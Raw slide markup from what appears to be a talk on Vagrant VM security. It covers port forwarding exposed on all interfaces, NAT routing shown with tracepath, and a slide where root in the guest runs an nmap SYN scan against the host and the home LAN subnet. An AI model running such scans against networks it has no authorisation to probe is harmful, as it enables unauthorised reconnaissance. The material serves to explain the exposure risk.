              <a:t>conig.vm.network</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-20" dirty="0"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”forwarded_port”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9080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guest:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-1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80,</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9080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host:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-1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8080</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9017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# binds to all interfaces </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill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default</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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57818" y="1523108"/>
            <a:ext cx="1928406" cy="12089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8589" y="2693473"/>
            <a:ext cx="2823845" cy="34480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-140" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Note: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Bind </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-145" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>all </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>interfaces. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Fixed </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>#ba91602 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in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spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2013.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900" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>However, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>all </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ports </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>accessible </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>when </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>public </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>network </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>was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-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>choosen.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pc="-55" dirty="0"/>
              <a:t>50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67" y="190436"/>
            <a:ext cx="2890520" cy="2228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THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-229" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-175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NETWORK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66040">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="865"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-114" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Port</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074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E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Forwarding</a:t>
            </a:r>
            <a:endParaRPr sz="120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  <a:spcBef>
                <a:spcPts val="1250"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-1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up</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="6604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$ www-browser</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-35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http://localhost:8080/html/index.html</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="840105">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pP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# Bind guest </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>port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80 to host </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>port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8080  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>conig.vm.network</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-20" dirty="0"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”forwarded_port”</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9080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guest:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-1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80,</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="9080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host:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-1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8080,</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90170" marR="1535430">
              <a:lnSpc>
                <a:spcPts val="1100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
            </a:pP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# bind to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-60" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="407F7F"/>
                </a:solidFill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only  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>host_ip:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0"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”127.0.0.1”</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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57691" y="1523105"/>
            <a:ext cx="1928164" cy="1208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8589" y="2693473"/>
            <a:ext cx="2823845" cy="34480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-140" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Note: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Bind </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-145" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>all </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-75" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>interfaces. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Fixed </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-70" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>#ba91602 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-60" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>in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spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>2013.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900" spc="-105" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>However, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>all </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ports </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-80" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>accessible </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-100" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>when </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-65" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>public </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>network </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-114" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>was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-95" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>choosen.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pc="-55" dirty="0"/>
              <a:t>51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122" y="190436"/>
            <a:ext cx="7664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>
                <a:solidFill>
                  <a:srgbClr val="F8007F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-254" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8007F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-170" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8007F"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr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867" y="699201"/>
            <a:ext cx="1623695" cy="1918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95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>List </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-150" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Commands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100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>init </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>&lt;box&gt;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5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>[url]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Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>vagrant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up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Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>vagrant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spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>halt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Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>destroy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5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>[--force]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Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>reload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100" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>vagrant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spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>ssh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Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>vagrant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spc="-5" dirty="0">
                <a:latin typeface="LM Roman 10"/>
                <a:cs typeface="LM Roman 10"/>
              </a:rPr>
              <a:t>status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1577" y="1075524"/>
            <a:ext cx="1530007" cy="1675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17" y="190436"/>
            <a:ext cx="16859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>
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-260" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-175" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr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89" y="817384"/>
            <a:ext cx="768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45" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Routing</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-225" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-180" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>(NAT)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589" y="1006631"/>
            <a:ext cx="2186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Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>root@vagrant-ubuntu-precise-64:~# tracepath</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="10" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>8.8.8.8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4626" y="1095146"/>
            <a:ext cx="812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Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>0.092ms </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>pmtu</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-45" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>1500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5161" y="1183665"/>
            <a:ext cx="3511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Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>0.176ms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4554" y="1272311"/>
            <a:ext cx="8547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Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>asymm </a:t>
            </a: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64</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>1.464ms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592" y="1095149"/>
            <a:ext cx="1240155" cy="60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815">
              <a:lnSpc>
                <a:spcPts val="710"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>1: 10.0.2.15 </a:t>
            </a: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(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>10.0.2.15</a:t>
            </a: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)</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="43815">
              <a:lnSpc>
                <a:spcPts val="695"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>1: 10.0.2.2</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>10.0.2.2</a:t>
            </a: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)</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="43815">
              <a:lnSpc>
                <a:spcPts val="695"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>2: router.home</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>192.168.1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="43815">
              <a:lnSpc>
                <a:spcPts val="710"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6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30" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Port</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-185" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-155" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Scans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592" y="1666512"/>
            <a:ext cx="3159125" cy="7499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600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>root@vagrant-ubuntu-precise-64:~# nmap -sS 10.0.2.2,192.168.1.1/24</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="30" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="600" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 6"/>
                <a:cs typeface="LM Roman 6"/>
              </a:rPr>
              <a:t>-Pn</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="LM Roman 6"/>
              <a:cs typeface="LM Roman 6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45" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
